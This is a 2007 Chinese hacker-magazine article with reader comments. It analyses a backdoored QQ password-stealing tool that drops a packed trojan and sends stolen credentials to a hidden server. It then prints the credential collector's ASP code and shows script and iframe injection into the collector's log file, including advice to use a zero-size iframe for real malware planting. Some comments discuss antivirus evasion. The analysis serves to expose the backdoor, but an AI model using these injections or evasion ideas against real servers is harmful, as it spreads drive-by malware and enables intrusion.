文章作者：fhod
说明：文章已发表于黑客手册07年10期，转载请注明出处！

QQ盗号软件后门分析与反击 作者:fhod 小财

对明小子QQ密码特工软件的分析 ----小财

今天无聊给一朋友讲解QQ盗取原理，从网上找了一个工具 “明小子QQ密码特工”结果发现这个软件有后门。下面就让我带着大家来分析一下。

首先我们用nod32来查一下有没有毒。图1

1.jpg (53 KB)

2007-10-25 15:37

看到了吧没有病毒。我们把监控打开在运行看看图2

2.jpg (56 KB)

2007-10-25 15:37

看到了吧 NOD32检测到了病毒。为了确认一下。我再用‘木马辅助查找器’的文件监视功能来检测下。

图3

3.jpg (98 KB)

2007-10-25 15:37

新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe

很明显软件本身在运行的同时释放了一个123.exe 而NOD32查杀到的也就是这个文件。

C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\

接着我们用peid查下123.exe. 图4

4.jpg (62 KB)

2007-10-25 15:37

EP段.nsp1经常搞免杀的应该知道这是北斗加的壳，我们再看看区段vmp 图5

5.jpg (22 KB)

2007-10-25 15:37

这个一看就是用vmprotect做的免杀。至于123.exe是什么木马咱门就不继续分析了。

接下来分析他生成后的文件是不是一样令人担忧。

随便配置一个图6

6.jpg (25 KB)

2007-10-25 15:37

Ollydbg手工给他脱壳esp定律简单 图7

7.jpg (169 KB)

2007-10-25 15:37

脱壳成功后我们在用PEID检测下 图8

8.jpg (25 KB)

2007-10-25 15:37

我们再用c32asm对他进行反汇编，搜索asp图9

9.jpg (136 KB)

2007-10-25 15:37

看到了什么 .刚才我是默认设置的应该是http://k.thec.cn/xieming/69q/qq.asp才对。，怎么会是http://langyeqq.cn/qq/newbacka.asp 这个呢！我们浏览看看 图10

10.jpg (26 KB)

2007-10-25 15:37

"pzQQ"看到了吧，说明就是他的盗号的，从这些可以确定，这个软件不但运行的时候施放一个木马，而且就连我们配置好的文件也被他留了后门，而作者就坐等着收号了。





后门反击战    作者：fhod[E.S.T VIP]



看到这..想必大家也和我一样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击.



我们来看看qq.asp的代码



首先来看

strLogFile="Q7.txt"

这个是QQ接受文件..默认的是q7.txt





继续看代码

QQNumber=request("QQNumber")

QQPassWord=request("QQPassWord")

QQclub=request("QQclub")

QQip=request("QQip")



是没经过任何过滤的..这些参数的数据我们完全可以自定义



在往下看

if QQNumber="" or QQPassWord="" then

response.write "pzQQ"

response.end



假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码

StrLogText=StrLogText&QQNumber&"----"&QQPassWord&"----会员:"&QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")

StrLogText=StrLogText&")"

写入q7.txt文件

格式为 QQ号码----QQ密码----会员:----IP:



继续看下面的代码

set f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建)

set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)

ff.writeline(StrLogText) (打开q7.txt并写入数据)

最后response.write "发送成功!" 满足条件提示成功.



所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.

http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123

图11

11.jpg (44 KB)

2007-10-25 15:37

这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下

http://www.ciker.org/soft/qq.asp ... ot;)</script>



图12

12.jpg (58 KB)

2007-10-25 15:37

插入代码成功...我们来看下

http://www.ciker.org/soft/q7.txt的源文件又是什么样的..



图13

13.jpg (45 KB)

2007-10-25 15:37

再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...



如果想反挂马的话..我们就可以提交以下数据

http://www.ciker.org/soft/qq.asp ... ></iframe>

图14

14.JPG (75 KB)

2007-10-25 15:37

当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0



好了..现在我们就可以给作者一个惊喜去了..图15

15.jpg (52 KB)

2007-10-25 15:37

好厉害！ 就是要有 汇编 脱壳 木马查杀 挂马 。。。很多技能

如果作者把那个 。ASP 文件修改过滤的话 是不是要弄服务器了啊

真厉害。不过作者，也太没道德了。。。

如果把网络的出口屏弊呢？？？

如果把ff.writeline(StrLogText)改成ff.writeline(Server.HtmlEncode(StrLogText))
我想楼主这次反击应该无效吧...

如果能把怎么发现自己是否中了qq病毒的方法也讲下，也许会更好。。
当然杀软查出来的不算。。

这个木马能过32种啥毒软件，。只是我不知道，木马是怎么免杀的，
用道具的话是无法运行的，改入口又只能过2，3个杀毒。。改花指令，不是自己编写的根本没什么做用，我一直在为免杀思考！！！！！